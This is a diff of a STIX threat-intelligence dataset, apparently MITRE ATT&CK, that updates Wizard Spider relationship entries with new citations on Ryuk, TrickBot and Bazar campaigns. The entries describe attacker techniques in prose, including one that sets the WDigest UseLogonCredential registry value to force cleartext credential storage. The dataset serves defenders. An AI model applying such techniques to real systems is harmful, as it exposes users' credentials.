{ "source_name": "QiAnXin APT-C-36 Feb2019", - "url": "https://ti.360.net/blog/articles/apt-c-36-continuous-attacks-targeting-colombian-government-institutions-and-corporations-en/", + "url": "https://web.archive.org/web/20190625182633if_/https://ti.360.net/blog/articles/apt-c-36-continuous-attacks-targeting-colombian-government-institutions-and-corporations-en/", "description": "QiAnXin Threat Intelligence Center. (2019, February 18). APT-C-36: Continuous Attacks Targeting Colombian Government Institutions and Corporations. Retrieved May 5, 2020." } ], @@ -183237,7 +188452,7 @@ "relationship_type": "uses", "id": "relationship--c3bedbae-b1e1-4a35-8c59-d181dca093e4", "type": "relationship", - "modified": "2020-05-07T22:53:31.241Z", + "modified": "2020-10-14T14:40:36.608Z", "created": "2020-05-07T22:53:31.241Z" }, { @@ -185321,109 +190536,144 @@ "created": "2020-05-12T14:26:05.035Z" }, { - "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "object_marking_refs": [ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" ], - "source_ref": "intrusion-set--dd2d9ca6-505b-4860-a604-233685b802c7", - "target_ref": "tool--ff6caf67-ea1f-4895-b80e-4bb0fc31c6db", "external_references": [ { "source_name": "CrowdStrike Grim Spider May 2019", - "url": "https://www.crowdstrike.com/blog/timelining-grim-spiders-big-game-hunting-tactics/", - "description": "John, E. and Carvey, H. (2019, May 30). Unraveling the Spiderweb: Timelining ATT&CK Artifacts Used by GRIM SPIDER. Retrieved May 12, 2020." + "description": "John, E. and Carvey, H. (2019, May 30). Unraveling the Spiderweb: Timelining ATT&CK Artifacts Used by GRIM SPIDER. Retrieved May 12, 2020.", + "url": "https://www.crowdstrike.com/blog/timelining-grim-spiders-big-game-hunting-tactics/" + }, + { + "source_name": "FireEye KEGTAP SINGLEMALT October 2020", + "description": "Kimberly Goody, Jeremy Kennelly, Joshua Shilko, Steve Elovitz, Douglas Bienstock. (2020, October 28). Unhappy Hour Special: KEGTAP and SINGLEMALT With a Ransomware Chaser. Retrieved October 28, 2020.", + "url": "https://www.fireeye.com/blog/threat-research/2020/10/kegtap-and-singlemalt-with-a-ransomware-chaser.html" } ], - "description": "(Citation: CrowdStrike Grim Spider May 2019)", - "relationship_type": "uses", "id": "relationship--fc19dd7e-415d-4e27-92bd-262392b6d38f", + "target_ref": "tool--ff6caf67-ea1f-4895-b80e-4bb0fc31c6db", "type": "relationship", - "modified": "2020-05-12T18:25:44.512Z", - "created": "2020-05-12T18:25:44.512Z" + "created": "2020-05-12T18:25:44.512Z", + "description": "(Citation: CrowdStrike Grim Spider May 2019)(Citation: FireEye KEGTAP SINGLEMALT October 2020)", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "source_ref": "intrusion-set--dd2d9ca6-505b-4860-a604-233685b802c7", + "relationship_type": "uses", + "modified": "2020-11-10T18:04:03.694Z" }, { - "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "object_marking_refs": [ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" ], - "source_ref": "intrusion-set--dd2d9ca6-505b-4860-a604-233685b802c7", - "target_ref": "malware--00806466-754d-44ea-ad6f-0caf59cb8556", "external_references": [ { "source_name": "CrowdStrike Grim Spider May 2019", - "url": "https://www.crowdstrike.com/blog/timelining-grim-spiders-big-game-hunting-tactics/", - "description": "John, E. and Carvey, H. (2019, May 30). Unraveling the Spiderweb: Timelining ATT&CK Artifacts Used by GRIM SPIDER. Retrieved May 12, 2020." + "description": "John, E. and Carvey, H. (2019, May 30). Unraveling the Spiderweb: Timelining ATT&CK Artifacts Used by GRIM SPIDER. Retrieved May 12, 2020.", + "url": "https://www.crowdstrike.com/blog/timelining-grim-spiders-big-game-hunting-tactics/" + }, + { + "source_name": "DHS/CISA Ransomware Targeting Healthcare October 2020", + "description": "DHS/CISA. (2020, October 28). Ransomware Activity Targeting the Healthcare and Public Health Sector. Retrieved October 28, 2020.", + "url": "https://us-cert.cisa.gov/ncas/alerts/aa20-302a" + }, + { + "source_name": "Sophos New Ryuk Attack October 2020", + "description": "Sean Gallagher, Peter Mackenzie, Elida Leite, Syed Shahram, Bill Kearney, Anand Aijan, Sivagnanam Gn, Suraj Mundalik. (2020, October 14). They\u2019re back: inside a new Ryuk ransomware attack. Retrieved October 14, 2020.", + "url": "https://news.sophos.com/en-us/2020/10/14/inside-a-new-ryuk-ransomware-attack/" } ], - "description": "(Citation: CrowdStrike Grim Spider May 2019)", - "relationship_type": "uses", "id": "relationship--02e03773-7cea-4b40-bf96-f22ccbc7187f", + "target_ref": "malware--00806466-754d-44ea-ad6f-0caf59cb8556", "type": "relationship", - "modified": "2020-05-12T18:25:44.515Z", - "created": "2020-05-12T18:25:44.515Z" + "created": "2020-05-12T18:25:44.515Z", + "description": "(Citation: CrowdStrike Grim Spider May 2019)(Citation: DHS/CISA Ransomware Targeting Healthcare October 2020)(Citation: Sophos New Ryuk Attack October 2020)", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "source_ref": "intrusion-set--dd2d9ca6-505b-4860-a604-233685b802c7", + "relationship_type": "uses", + "modified": "2020-11-10T18:04:03.782Z" }, { - "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "object_marking_refs": [ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" ], - "source_ref": "intrusion-set--dd2d9ca6-505b-4860-a604-233685b802c7", - "target_ref": "tool--3433a9e8-1c47-4320-b9bf-ed449061d1c3", "external_references": [ { "source_name": "CrowdStrike Grim Spider May 2019", - "url": "https://www.crowdstrike.com/blog/timelining-grim-spiders-big-game-hunting-tactics/", - "description": "John, E. and Carvey, H. (2019, May 30). Unraveling the Spiderweb: Timelining ATT&CK Artifacts Used by GRIM SPIDER. Retrieved May 12, 2020." + "description": "John, E. and Carvey, H. (2019, May 30). Unraveling the Spiderweb: Timelining ATT&CK Artifacts Used by GRIM SPIDER. Retrieved May 12, 2020.", + "url": "https://www.crowdstrike.com/blog/timelining-grim-spiders-big-game-hunting-tactics/" + }, + { + "source_name": "DHS/CISA Ransomware Targeting Healthcare October 2020", + "description": "DHS/CISA. (2020, October 28). Ransomware Activity Targeting the Healthcare and Public Health Sector. Retrieved October 28, 2020.", + "url": "https://us-cert.cisa.gov/ncas/alerts/aa20-302a" + }, + { + "source_name": "FireEye KEGTAP SINGLEMALT October 2020", + "description": "Kimberly Goody, Jeremy Kennelly, Joshua Shilko, Steve Elovitz, Douglas Bienstock. (2020, October 28). Unhappy Hour Special: KEGTAP and SINGLEMALT With a Ransomware Chaser. Retrieved October 28, 2020.", + "url": "https://www.fireeye.com/blog/threat-research/2020/10/kegtap-and-singlemalt-with-a-ransomware-chaser.html" } ], - "description": "(Citation: CrowdStrike Grim Spider May 2019)", - "relationship_type": "uses", "id": "relationship--d73c0fd6-cbd9-4eaa-abca-a1626364ab1b", + "target_ref": "tool--3433a9e8-1c47-4320-b9bf-ed449061d1c3", "type": "relationship", - "modified": "2020-05-12T18:25:44.530Z", - "created": "2020-05-12T18:25:44.530Z" + "created": "2020-05-12T18:25:44.530Z", + "description": "(Citation: CrowdStrike Grim Spider May 2019)(Citation: DHS/CISA Ransomware Targeting Healthcare October 2020)(Citation: FireEye KEGTAP SINGLEMALT October 2020)", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "source_ref": "intrusion-set--dd2d9ca6-505b-4860-a604-233685b802c7", + "relationship_type": "uses", + "modified": "2020-11-10T18:04:03.787Z" }, { - "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "object_marking_refs": [ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" ], - "source_ref": "intrusion-set--dd2d9ca6-505b-4860-a604-233685b802c7", - "target_ref": "malware--32066e94-3112-48ca-b9eb-ba2b59d2f023", "external_references": [ { "source_name": "CrowdStrike Grim Spider May 2019", - "url": "https://www.crowdstrike.com/blog/timelining-grim-spiders-big-game-hunting-tactics/", - "description": "John, E. and Carvey, H. (2019, May 30). Unraveling the Spiderweb: Timelining ATT&CK Artifacts Used by GRIM SPIDER. Retrieved May 12, 2020." + "description": "John, E. and Carvey, H. (2019, May 30). Unraveling the Spiderweb: Timelining ATT&CK Artifacts Used by GRIM SPIDER. Retrieved May 12, 2020.", + "url": "https://www.crowdstrike.com/blog/timelining-grim-spiders-big-game-hunting-tactics/" + }, + { + "source_name": "Sophos New Ryuk Attack October 2020", + "description": "Sean Gallagher, Peter Mackenzie, Elida Leite, Syed Shahram, Bill Kearney, Anand Aijan, Sivagnanam Gn, Suraj Mundalik. (2020, October 14). They\u2019re back: inside a new Ryuk ransomware attack. Retrieved October 14, 2020.", + "url": "https://news.sophos.com/en-us/2020/10/14/inside-a-new-ryuk-ransomware-attack/" } ], - "description": "(Citation: CrowdStrike Grim Spider May 2019)", - "relationship_type": "uses", "id": "relationship--8263754e-20a6-49ac-9ffb-3f0e9113b228", + "target_ref": "malware--32066e94-3112-48ca-b9eb-ba2b59d2f023", "type": "relationship", - "modified": "2020-05-12T18:25:44.532Z", - "created": "2020-05-12T18:25:44.532Z" + "created": "2020-05-12T18:25:44.532Z", + "description": "(Citation: CrowdStrike Grim Spider May 2019)(Citation: Sophos New Ryuk Attack October 2020)", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "source_ref": "intrusion-set--dd2d9ca6-505b-4860-a604-233685b802c7", + "relationship_type": "uses", + "modified": "2020-11-10T18:04:03.780Z" }, { - "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "object_marking_refs": [ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" ], - "source_ref": "intrusion-set--dd2d9ca6-505b-4860-a604-233685b802c7", - "target_ref": "attack-pattern--2e34237d-8574-43f6-aace-ae2915de8597", "external_references": [ { "source_name": "CrowdStrike Grim Spider May 2019", - "url": "https://www.crowdstrike.com/blog/timelining-grim-spiders-big-game-hunting-tactics/", - "description": "John, E. and Carvey, H. (2019, May 30). Unraveling the Spiderweb: Timelining ATT&CK Artifacts Used by GRIM SPIDER. Retrieved May 12, 2020." + "description": "John, E. and Carvey, H. (2019, May 30). Unraveling the Spiderweb: Timelining ATT&CK Artifacts Used by GRIM SPIDER. Retrieved May 12, 2020.", + "url": "https://www.crowdstrike.com/blog/timelining-grim-spiders-big-game-hunting-tactics/" + }, + { + "source_name": "Red Canary Hospital Thwarted Ryuk October 2020", + "description": "Brian Donohue, Katie Nickels, Paul Michaud, Adina Bodkins, Taylor Chapman, Tony Lambert, Jeff Felling, Kyle Rainey, Mike Haag, Matt Graeber, Aaron Didier.. (2020, October 29). A Bazar start: How one hospital thwarted a Ryuk ransomware outbreak. Retrieved October 30, 2020.", + "url": "https://redcanary.com/blog/how-one-hospital-thwarted-a-ryuk-ransomware-outbreak/ " } ], - "description": "[Wizard Spider](https://attack.mitre.org/groups/G0102) has used spearphishing attachments to deliver Microsoft documents containing macros to download either [Emotet](https://attack.mitre.org/software/S0367), Bokbot, or [TrickBot](https://attack.mitre.org/software/S0266).(Citation: CrowdStrike Grim Spider May 2019)", - "relationship_type": "uses", "id": "relationship--c671056c-f213-4084-9e9e-3361274ceb80", + "target_ref": "attack-pattern--2e34237d-8574-43f6-aace-ae2915de8597", "type": "relationship", - "modified": "2020-05-15T18:52:17.500Z", - "created": "2020-05-12T18:42:01.854Z" + "created": "2020-05-12T18:42:01.854Z", + "description": "[Wizard Spider](https://attack.mitre.org/groups/G0102) has used spearphishing attachments to deliver Microsoft documents containing macros or PDFs containing malicious links to download either [Emotet](https://attack.mitre.org/software/S0367), Bokbot, [TrickBot](https://attack.mitre.org/software/S0266), or Bazar.(Citation: CrowdStrike Grim Spider May 2019)(Citation: Red Canary Hospital Thwarted Ryuk October 2020)", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "source_ref": "intrusion-set--dd2d9ca6-505b-4860-a604-233685b802c7", + "relationship_type": "uses", + "modified": "2020-11-10T17:06:02.445Z" }, { "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", @@ -186061,345 +191311,389 @@ "created": "2020-05-12T22:22:08.596Z" }, { - "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "object_marking_refs": [ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" ], - "source_ref": "intrusion-set--dd2d9ca6-505b-4860-a604-233685b802c7", - "target_ref": "attack-pattern--57340c81-c025-4189-8fa0-fc7ede51bae4", "external_references": [ { "source_name": "CrowdStrike Grim Spider May 2019", - "url": "https://www.crowdstrike.com/blog/timelining-grim-spiders-big-game-hunting-tactics/", - "description": "John, E. and Carvey, H. (2019, May 30). Unraveling the Spiderweb: Timelining ATT&CK Artifacts Used by GRIM SPIDER. Retrieved May 12, 2020." + "description": "John, E. and Carvey, H. (2019, May 30). Unraveling the Spiderweb: Timelining ATT&CK Artifacts Used by GRIM SPIDER. Retrieved May 12, 2020.", + "url": "https://www.crowdstrike.com/blog/timelining-grim-spiders-big-game-hunting-tactics/" } ], - "description": "[Wizard Spider](https://attack.mitre.org/groups/G0102) has modified the Registry key HKLM\\System\\CurrentControlSet\\Control\\SecurityProviders\\WDigest by setting the UseLogonCredential registry value to 1 in order to force credentials to be stored in clear text in memory.(Citation: CrowdStrike Grim Spider May 2019)", - "relationship_type": "uses", "id": "relationship--75f0ea4c-5b88-4b14-9859-67379f4ba9b0", + "target_ref": "attack-pattern--57340c81-c025-4189-8fa0-fc7ede51bae4", "type": "relationship", - "modified": "2020-05-13T12:42:06.757Z", - "created": "2020-05-13T12:42:06.757Z" + "created": "2020-05-13T12:42:06.757Z", + "description": "[Wizard Spider](https://attack.mitre.org/groups/G0102) has modified the Registry key HKLM\\System\\CurrentControlSet\\Control\\SecurityProviders\\WDigest by setting the UseLogonCredential registry value to 1 in order to force credentials to be stored in clear text in memory.(Citation: CrowdStrike Grim Spider May 2019)", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "source_ref": "intrusion-set--dd2d9ca6-505b-4860-a604-233685b802c7", + "relationship_type": "uses", + "modified": "2020-05-13T12:42:06.757Z" }, { - "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "object_marking_refs": [ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" ], - "source_ref": "intrusion-set--dd2d9ca6-505b-4860-a604-233685b802c7", - "target_ref": "attack-pattern--232b7f21-adf9-4b42-b936-b9d6f7df856e", "external_references": [ { "source_name": "CrowdStrike Grim Spider May 2019", - "url": "https://www.crowdstrike.com/blog/timelining-grim-spiders-big-game-hunting-tactics/", - "description": "John, E. and Carvey, H. (2019, May 30). Unraveling the Spiderweb: Timelining ATT&CK Artifacts Used by GRIM SPIDER. Retrieved May 12, 2020." + "description": "John, E. and Carvey, H. (2019, May 30). Unraveling the Spiderweb: Timelining ATT&CK Artifacts Used by GRIM SPIDER. Retrieved May 12, 2020.", + "url": "https://www.crowdstrike.com/blog/timelining-grim-spiders-big-game-hunting-tactics/" } ], - "description": "[Wizard Spider](https://attack.mitre.org/groups/G0102) has lured victims to execute malware with spearphishing attachments containing macros to download either [Emotet](https://attack.mitre.org/software/S0367), Bokbot, or [TrickBot](https://attack.mitre.org/software/S0266).(Citation: CrowdStrike Grim Spider May 2019)", - "relationship_type": "uses", "id": "relationship--53e1bf2f-7ab4-4173-879b-9975618c4527", + "target_ref": "attack-pattern--232b7f21-adf9-4b42-b936-b9d6f7df856e", "type": "relationship", - "modified": "2020-05-13T12:42:06.786Z", - "created": "2020-05-13T12:42:06.786Z" + "created": "2020-05-13T12:42:06.786Z", + "description": "[Wizard Spider](https://attack.mitre.org/groups/G0102) has lured victims to execute malware with spearphishing attachments containing macros to download either [Emotet](https://attack.mitre.org/software/S0367), Bokbot, or [TrickBot](https://attack.mitre.org/software/S0266).(Citation: CrowdStrike Grim Spider May 2019)", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "source_ref": "intrusion-set--dd2d9ca6-505b-4860-a604-233685b802c7", + "relationship_type": "uses", + "modified": "2020-05-13T12:42:06.786Z" }, { - "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "object_marking_refs": [ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" ], - "source_ref": "intrusion-set--dd2d9ca6-505b-4860-a604-233685b802c7", - "target_ref": "attack-pattern--7bdca9d5-d500-4d7d-8c52-5fd47baf4c0c", "external_references": [ { "source_name": "CrowdStrike Grim Spider May 2019", - "url": "https://www.crowdstrike.com/blog/timelining-grim-spiders-big-game-hunting-tactics/", - "description": "John, E. and Carvey, H. (2019, May 30). Unraveling the Spiderweb: Timelining ATT&CK Artifacts Used by GRIM SPIDER. Retrieved May 12, 2020." + "description": "John, E. and Carvey, H. (2019, May 30). Unraveling the Spiderweb: Timelining ATT&CK Artifacts Used by GRIM SPIDER. Retrieved May 12, 2020.", + "url": "https://www.crowdstrike.com/blog/timelining-grim-spiders-big-game-hunting-tactics/" + }, + { + "source_name": "FireEye KEGTAP SINGLEMALT October 2020", + "description": "Kimberly Goody, Jeremy Kennelly, Joshua Shilko, Steve Elovitz, Douglas Bienstock. (2020, October 28). Unhappy Hour Special: KEGTAP and SINGLEMALT With a Ransomware Chaser. Retrieved October 28, 2020.", + "url": "https://www.fireeye.com/blog/threat-research/2020/10/kegtap-and-singlemalt-with-a-ransomware-chaser.html" } ], - "description": "[Wizard Spider](https://attack.mitre.org/groups/G0102) has used scheduled tasks to install [TrickBot](https://attack.mitre.org/software/S0266), using task names to appear legitimate such as WinDotNet, GoogleTask, or Sysnetsf.(Citation: CrowdStrike Grim Spider May 2019)", - "relationship_type": "uses", "id": "relationship--7e555910-0e1b-403d-a369-e7a2e8e61670", + "target_ref": "attack-pattern--7bdca9d5-d500-4d7d-8c52-5fd47baf4c0c", "type": "relationship", - "modified": "2020-05-15T18:52:17.528Z", - "created": "2020-05-13T13:20:59.322Z" + "created": "2020-05-13T13:20:59.322Z", + "description": "[Wizard Spider](https://attack.mitre.org/groups/G0102) has used scheduled tasks to install [TrickBot](https://attack.mitre.org/software/S0266), using task names to appear legitimate such as WinDotNet, GoogleTask, or Sysnetsf.(Citation: CrowdStrike Grim Spider May 2019) It has also used common document file names for other malware binaries.(Citation: FireEye KEGTAP SINGLEMALT October 2020)", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "source_ref": "intrusion-set--dd2d9ca6-505b-4860-a604-233685b802c7", + "relationship_type": "uses", + "modified": "2020-11-10T17:28:19.629Z" }, { - "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "object_marking_refs": [ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" ], - "source_ref": "intrusion-set--dd2d9ca6-505b-4860-a604-233685b802c7", - "target_ref": "attack-pattern--005a06c6-14bf-4118-afa0-ebcd8aebb0c9", "external_references": [ { "source_name": "CrowdStrike Grim Spider May 2019", - "url": "https://www.crowdstrike.com/blog/timelining-grim-spiders-big-game-hunting-tactics/", - "description": "John, E. and Carvey, H. (2019, May 30). Unraveling the Spiderweb: Timelining ATT&CK Artifacts Used by GRIM SPIDER. Retrieved May 12, 2020." + "description": "John, E. and Carvey, H. (2019, May 30). Unraveling the Spiderweb: Timelining ATT&CK Artifacts Used by GRIM SPIDER. Retrieved May 12, 2020.", + "url": "https://www.crowdstrike.com/blog/timelining-grim-spiders-big-game-hunting-tactics/" + }, + { + "source_name": "DHS/CISA Ransomware Targeting Healthcare October 2020", + "description": "DHS/CISA. (2020, October 28). Ransomware Activity Targeting the Healthcare and Public Health Sector. Retrieved October 28, 2020.", + "url": "https://us-cert.cisa.gov/ncas/alerts/aa20-302a" + }, + { + "source_name": "FireEye KEGTAP SINGLEMALT October 2020", + "description": "Kimberly Goody, Jeremy Kennelly, Joshua Shilko, Steve Elovitz, Douglas Bienstock. (2020, October 28). Unhappy Hour Special: KEGTAP and SINGLEMALT With a Ransomware Chaser. Retrieved October 28, 2020.", + "url": "https://www.fireeye.com/blog/threat-research/2020/10/kegtap-and-singlemalt-with-a-ransomware-chaser.html" + }, + { + "source_name": "DFIR Ryuk 2 Hour Speed Run November 2020", + "description": "The DFIR Report. (2020, November 5). Ryuk Speed Run, 2 Hours to Ransom. Retrieved November 6, 2020.", + "url": "https://thedfirreport.com/2020/11/05/ryuk-speed-run-2-hours-to-ransom/" } ], - "description": "[Wizard Spider](https://attack.mitre.org/groups/G0102) has used scheduled tasks establish persistence for [TrickBot](https://attack.mitre.org/software/S0266).(Citation: CrowdStrike Grim Spider May 2019)", - "relationship_type": "uses", "id": "relationship--57f8c6d0-406d-4e97-b3ff-5b2f0274231b", + "target_ref": "attack-pattern--005a06c6-14bf-4118-afa0-ebcd8aebb0c9", "type": "relationship", - "modified": "2020-05-15T18:52:17.537Z", - "created": "2020-05-13T13:20:59.339Z" + "created": "2020-05-13T13:20:59.339Z", + "description": "[Wizard Spider](https://attack.mitre.org/groups/G0102) has used scheduled tasks establish persistence for [TrickBot](https://attack.mitre.org/software/S0266) and other malware.(Citation: CrowdStrike Grim Spider May 2019)(Citation: DHS/CISA Ransomware Targeting Healthcare October 2020)(Citation: FireEye KEGTAP SINGLEMALT October 2020)(Citation: DFIR Ryuk 2 Hour Speed Run November 2020)", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "source_ref": "intrusion-set--dd2d9ca6-505b-4860-a604-233685b802c7", + "relationship_type": "uses", + "modified": "2020-11-10T18:04:02.180Z" }, { - "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "object_marking_refs": [ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" ], - "source_ref": "intrusion-set--dd2d9ca6-505b-4860-a604-233685b802c7", - "target_ref": "attack-pattern--970a3432-3237-47ad-bcca-7d8cbb217736", "external_references": [ { "source_name": "CrowdStrike Grim Spider May 2019", - "url": "https://www.crowdstrike.com/blog/timelining-grim-spiders-big-game-hunting-tactics/", - "description": "John, E. and Carvey, H. (2019, May 30). Unraveling the Spiderweb: Timelining ATT&CK Artifacts Used by GRIM SPIDER. Retrieved May 12, 2020." + "description": "John, E. and Carvey, H. (2019, May 30). Unraveling the Spiderweb: Timelining ATT&CK Artifacts Used by GRIM SPIDER. Retrieved May 12, 2020.", + "url": "https://www.crowdstrike.com/blog/timelining-grim-spiders-big-game-hunting-tactics/" + }, + { + "source_name": "DHS/CISA Ransomware Targeting Healthcare October 2020", + "description": "DHS/CISA. (2020, October 28). Ransomware Activity Targeting the Healthcare and Public Health Sector. Retrieved October 28, 2020.", + "url": "https://us-cert.cisa.gov/ncas/alerts/aa20-302a" + }, + { + "source_name": "FireEye KEGTAP SINGLEMALT October 2020", + "description": "Kimberly Goody, Jeremy Kennelly, Joshua Shilko, Steve Elovitz, Douglas Bienstock. (2020, October 28). Unhappy Hour Special: KEGTAP and SINGLEMALT With a Ransomware Chaser. Retrieved October 28, 2020.", + "url": "https://www.fireeye.com/blog/threat-research/2020/10/kegtap-and-singlemalt-with-a-ransomware-chaser.html" + }, + { + "source_name": "Red Canary Hospital Thwarted Ryuk October 2020", + "description": "Brian Donohue, Katie Nickels, Paul Michaud, Adina Bodkins, Taylor Chapman, Tony Lambert, Jeff Felling, Kyle Rainey, Mike Haag, Matt Graeber, Aaron Didier.. (2020, October 29). A Bazar start: How one hospital thwarted a Ryuk ransomware outbreak. Retrieved October 30, 2020.", + "url": "https://redcanary.com/blog/how-one-hospital-thwarted-a-ryuk-ransomware-outbreak/ " } ], - "description": "[Wizard Spider](https://attack.mitre.org/groups/G0102) has used macros to execute PowerShell scripts to download malware on victims machines.(Citation: CrowdStrike Grim Spider May 2019)", - "relationship_type": "uses", "id": "relationship--73baa214-fbe6-477e-9beb-d1a08a6d117f", + "target_ref": "attack-pattern--970a3432-3237-47ad-bcca-7d8cbb217736", "type": "relationship", - "modified": "2020-05-13T13:20:59.343Z", - "created": "2020-05-13T13:20:59.343Z" + "created": "2020-05-13T13:20:59.343Z", + "description": "[Wizard Spider](https://attack.mitre.org/groups/G0102) has used macros to execute PowerShell scripts to download malware on victim's machines.(Citation: CrowdStrike Grim Spider May 2019) It has also used PowerShell to execute commands and move laterally through a victim network.(Citation: DHS/CISA Ransomware Targeting Healthcare October 2020)(Citation: FireEye KEGTAP SINGLEMALT October 2020)(Citation: Red Canary Hospital Thwarted Ryuk October 2020)", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "source_ref": "intrusion-set--dd2d9ca6-505b-4860-a604-233685b802c7", + "relationship_type": "uses", + "modified": "2020-11-10T17:28:19.684Z" }, { - "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "object_marking_refs": [ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" ], - "source_ref": "intrusion-set--dd2d9ca6-505b-4860-a604-233685b802c7", - "target_ref": "attack-pattern--731f4f55-b6d0-41d1-a7a9-072a66389aea", "external_references": [ { "source_name": "CrowdStrike Grim Spider May 2019", - "url": "https://www.crowdstrike.com/blog/timelining-grim-spiders-big-game-hunting-tactics/", - "description": "John, E. and Carvey, H. (2019, May 30). Unraveling the Spiderweb: Timelining ATT&CK Artifacts Used by GRIM SPIDER. Retrieved May 12, 2020." + "description": "John, E. and Carvey, H. (2019, May 30). Unraveling the Spiderweb: Timelining ATT&CK Artifacts Used by GRIM SPIDER. Retrieved May 12, 2020.", + "url": "https://www.crowdstrike.com/blog/timelining-grim-spiders-big-game-hunting-tactics/" } ], - "description": "[Wizard Spider](https://attack.mitre.org/groups/G0102) has used a module named NewBCtestnDll64 as a reverse SOCKS proxy.(Citation: CrowdStrike Grim Spider May 2019)", - "relationship_type": "uses", - "id": "relationship--f8a48d68-8557-4e17-a04b-9226efd4f4ef", - "type": "relationship", - "modified": "2020-05-15T18:52:17.578Z", - "created": "2020-05-13T13:20:59.374Z" - }, - { - "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", - "object_marking_refs": [ - "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" - ], - "source_ref": "intrusion-set--dd2d9ca6-505b-4860-a604-233685b802c7", - "target_ref": "attack-pattern--d63a3fb8-9452-4e9d-a60a-54be68d5998c", - "external_references": [ - { - "source_name": "CrowdStrike Grim Spider May 2019", - "url": "https://www.crowdstrike.com/blog/timelining-grim-spiders-big-game-hunting-tactics/", - "description": "John, E. and Carvey, H. (2019, May 30). Unraveling the Spiderweb: Timelining ATT&CK Artifacts Used by GRIM SPIDER. Retrieved May 12, 2020." - } - ], - "description": "[Wizard Spider](https://attack.mitre.org/groups/G0102) has used file deletion to remove some modules and configurations from an infected host after use.(Citation: CrowdStrike Grim Spider May 2019)", - "relationship_type": "uses", "id": "relationship--5c252868-1474-4fed-b3b2-07a6d3415034", + "target_ref": "attack-pattern--d63a3fb8-9452-4e9d-a60a-54be68d5998c", "type": "relationship", - "modified": "2020-05-13T13:58:12.424Z", - "created": "2020-05-13T13:58:12.424Z" + "created": "2020-05-13T13:58:12.424Z", + "description": "[Wizard Spider](https://attack.mitre.org/groups/G0102) has used file deletion to remove some modules and configurations from an infected host after use.(Citation: CrowdStrike Grim Spider May 2019)", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "source_ref": "intrusion-set--dd2d9ca6-505b-4860-a604-233685b802c7", + "relationship_type": "uses", + "modified": "2020-05-13T13:58:12.424Z" }, { - "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "object_marking_refs": [ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" ], - "source_ref": "intrusion-set--dd2d9ca6-505b-4860-a604-233685b802c7", - "target_ref": "attack-pattern--2959d63f-73fd-46a1-abd2-109d7dcede32", "external_references": [ { "source_name": "CrowdStrike Grim Spider May 2019", - "url": "https://www.crowdstrike.com/blog/timelining-grim-spiders-big-game-hunting-tactics/", - "description": "John, E. and Carvey, H. (2019, May 30). Unraveling the Spiderweb: Timelining ATT&CK Artifacts Used by GRIM SPIDER. Retrieved May 12, 2020." + "description": "John, E. and Carvey, H. (2019, May 30). Unraveling the Spiderweb: Timelining ATT&CK Artifacts Used by GRIM SPIDER. Retrieved May 12, 2020.", + "url": "https://www.crowdstrike.com/blog/timelining-grim-spiders-big-game-hunting-tactics/" } ], - "description": "[Wizard Spider](https://attack.mitre.org/groups/G0102) has installed [TrickBot](https://attack.mitre.org/software/S0266) as a service named ControlServiceA in order to establish persistence.(Citation: CrowdStrike Grim Spider May 2019)", - "relationship_type": "uses", "id": "relationship--2b5965fe-b178-4c03-91af-942491c79302", + "target_ref": "attack-pattern--2959d63f-73fd-46a1-abd2-109d7dcede32", "type": "relationship", - "modified": "2020-05-13T13:58:12.493Z", - "created": "2020-05-13T13:58:12.493Z" + "created": "2020-05-13T13:58:12.493Z", + "description": "[Wizard Spider](https://attack.mitre.org/groups/G0102) has installed [TrickBot](https://attack.mitre.org/software/S0266) as a service named ControlServiceA in order to establish persistence.(Citation: CrowdStrike Grim Spider May 2019)", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "source_ref": "intrusion-set--dd2d9ca6-505b-4860-a604-233685b802c7", + "relationship_type": "uses", + "modified": "2020-05-13T13:58:12.493Z" }, { - "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "object_marking_refs": [ 